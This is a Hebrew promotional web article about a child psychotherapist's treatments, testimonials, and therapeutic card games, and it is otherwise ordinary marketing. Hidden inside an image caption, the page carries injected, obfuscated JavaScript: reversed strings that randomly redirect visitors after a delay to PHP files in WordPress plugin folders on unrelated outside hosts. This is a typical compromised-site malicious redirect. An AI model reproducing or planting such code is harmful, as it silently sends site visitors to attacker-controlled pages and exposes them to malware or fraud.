fbpx
[shortcode-weather-atlas city_selector=1178240 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

שמתם לב להתנהגות לא יציבה ובעיות רגשיות אצל ילדכם?

הסגר שינה את אורח החיים של כולנו, לנו המבוגרים קשה לעכל את השינויים הקיצוניים בשגרת חיינו שנקטעה, ולילדנו קשה אף יותר. שרה לימור, פסיכותרפיסטית לילדים, נוער ומתבגרים, מספקת את המענה המדויק עבור הקשיים שילדכם עוברים בתקופה כה מורכבת ומעבירה מגוון רחב של טיפולים המותאמים לבעיות התנהגותיות שונות בילדים.
שרה לימור, פסיכותרפיסטית לילדים | צילום: shutterstock
שרה לימור, פסיכותרפיסטית לילדים | צילום: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

אם הבחנתם בשינוי ניכר בהתנהגות של ילדכם, אל תעלימו עין. מצוקה בקרב ילדים יכולה לבוא לידי ביטוי באופנים שונים כמו קשיי אכילה, קשיי הירדמות, קשיים חברתיים או שינוי קיצוני ולא מוסבר בהתנהגות הילד ותפקודו. ילדים בשל גילם ומאפיין ההתפתחות שלהם, לרוב אינם מבטאים מצוקה או קושי באופן מילולי ישיר כמו המבוגר, המצוקה מתבטאת בהתנהגות ובתפקוד של הילד ביום יום במסגרות השונות.

במרבית המקרים אתם תצליחו להקנות לילדיכם הכוונה, כלים ותמיכה שיאפשרו להם להתמודד עם הקשיים השונים. אלא שלעיתים הורים מרגישים כי הילד חווה מצוקה או קשיים הפוגעים בתפקודו ובהתפתחותו התקינה.

הורים ממליצים ומספרים על ילדיהם

אוקסנה הגיעה לטיפול עם הבן שלה בן ה-11, בשל בעיות התנהגות של מצב רגשי מורכב. חרדות, שינויים במצבי רוח, אימפולסיביות, אובססיביות.

"הילד טופל אצל שרה לימור במשך שבעה חודשים, טיפול cbt פעם בשבוע באופן אינטנסיבי. לאחר הטיפול הבחנו כי חל שינוי ניכר בדפוסי החשיבה ובדפוסי ההתנהגות שבאו לידי ביטוי ביצירת קשר חברתי, בקשר איתי, עם אחיו ובהתנהגות בבית הספר. התנהגותו השתפרה באופן משמעותי."

עדי הגיעה לטיפול עם הבן שלה בן ה-8, הלוקה בADHD. מתבטא בבעיות התנהגות, וויסות חושי ואובססיביות.

"הילד טופל אצל שרה לימור במשך כחצי שנה, שיטת הטיפול שקיבל היא השיטה שלי וויסות חושי ע"י תרגילים מוטוריים לוויסות המערכת הסנסומוטורית. הילד שלי קיבל טיפול רגשי ע"י המשחקים ששרה פיתחה. שמנו לב שחל שיפור ניכר בהתנהגות במצב הרגשי של הילד הבא לידי ביטוי בגמישות, באובססיות, בתבניתיות. שרה הצילה אותנו בתקופה קשה, אורח החיים שלנו השתפר לחלוטין."

שירן הגיעה לטיפול עם הילד שלה בן ה8.5 עם קשיים בוויסות חושי.

"הילד שלי טופל פעם בשבוע במשך חצי שנה. שיטת הטיפול ששרה העניקה לו הייתה בוויסות חושי ע"י תרגילים מוטוריים. הבחנו כי חל שיפור ניכר התנהגותי רגשי, הילד הפחית אובססיות וחרדה."

ליווי אישי לאורך כל הדרך

שרה לימור, בוגרת תואר ראשון בפסיכולוגיה –  מדעי ההתנהגות, ותואר שני עם התמחות בלימודי משפחה, מנהלת קליניקה עצמאית בחדרה העוסקת בחיבור שבין הגוף והנפש. לימור מעבירה מגוון רחב של טיפולים המותאמים לבעיות התנהגותיות שונות, "הטיפולים שלי נעשים במיטב השיטות הידועות כיום בתחום, לרבות טיפולים באמצעות פסיכותרפיה, משחק ויצירה. כשמאחוריי ניסיון טיפולי במטופלים רבים, כולי ריגוש וסיפוק לסייע לאנשים, לכוון וללוות אותם בתהליך השינוי כך שיוכלו להפיק מעצמם את מלוא הפוטנציאל האישי, ולשפר בקביעות את איכות חייהם בכל תחום".

 

אחד המשחקים הטיפוליים שפיתחה לימור | צילום: באדיבות שרה לימור
אחד המשחקים הטיפוליים שפיתחה לימור | צילום: באדיבות שרה לימור

 

השאירו פרטים וקבלו ייעוץ ראשוני ללא עלות משרה לימור

לאורך השנים פיתחה לימור מספר כלים טיפוליים

טיפולים אלו מספקים מענה למגוון רחב של קשיים, ויכולים לשמש אתכם ההורים במיוחד בימים אלה. בקרוב יצאו משחקים חינוכיים חדשים שלימור פיתחה, לאור ההצלחה הרבה שנחלו הכלים שהוציאה בעבר.

יחד מתמודדים

"המשחק 'יחד מתמודדים' הוא משחק חינוכי המשמש כלי טיפולי עבור מטפלים, מאמנים, מורים, גננות והורים. המשחק הטיפולי מתאים לכל הגילים, איכותי, חוויתי ומהנה.  הכלי משלב קלפי התמודדות עם חרדות, פחדים וסיטואציות שכולנו חווים בחיי היום יום, לצד קלפי תרגול המעודדים תהליכים עמוקים ומשחררים את המחסומים.

יחד בשביל האוטיזם

הספר 'יחד בשביל האוטיזם' הוא מדריך שימושי להורים המתמודדים עם ילדים הלוקים בקשב וריכוז, בעיות התנהגות, ויסות חושי ואוטיזם. במהלך הספר משתפת לימור בשיטת טיפול שפיתחה, ובו אסטרטגיות וכלים. הספר מלמד אתכם ההורים דרכים בהתמודדות עם אתגרים.

יחד בשביל ההורות

קלפים טיפוליים המאפשרים שיח מעמיק בין הורים וילדים, על נושאים שאינם פתורים ומקשים על שגרת היום יום, בפתיחות ובכבוד הדדי. השימוש בקלפים מלמד את מיומנויות השיחה הדרושות, כגון הקשבה, ביטוי, שיתוף פעולה, עידוד וכדומה.

יחד מרגישים

משחק הקלפים 'יחד מרגישים' מלמד את הילדים להכיר, לדבר ולבטא רגשות. הילדים חווים תהליך המאפשר התבוננות אל עולמם הפנימי ומחבר אותם אל אישיותם. בסוף התהליך הילדים מפתחים חוסן רגשי להתמודדות עם מגוון קשיים ואתגרים.

הדרך אל השינוי האישי

לאחר אבחון והערכה מותאמת לתוכנית טיפולית, הילד מקבל טיפול רגשי המותאם לשפה שלו ונעשה דרך משחק המאפשר לו להביע את רגשותיו בדרך מהנה ובלתי מאיימת. המשחק מותאם לגילו של הילד ועבור ילדים או בני נוער היכולים לדבר על מצוקותיהם באופן ישיר.

אתם ההורים מהווים חלק בלתי נפרד מהתהליך הטיפולי שעובר הילד, תוכנית הטיפול נבחנת יחד איתכם. לטיפול בילד מתווספת הדרכה הורית המאפשרת לכם להיות מעורבים בטיפול ונותנת כלים לסייע לילד וליישם את המלצות הטיפול.

הורים רבים נעזרים בשירותיה של שרה לימור ומעידים על שינוי אמיתי בהתנהגות ילדיהם. לימור ממשיכה לקיים טיפולים גם בתקופה זו אצלה בקליניקה או בעזרת הזום ושיחות טלפון, בליווי אישי לאורך כל הדרך.

 

השאירו פרטים וקבלו ייעוץ ראשוני ללא עלות משרה לימור

אהבתם? שתפו!

אולי גם יעניין אותך

שיתוף ברשתות החברתיות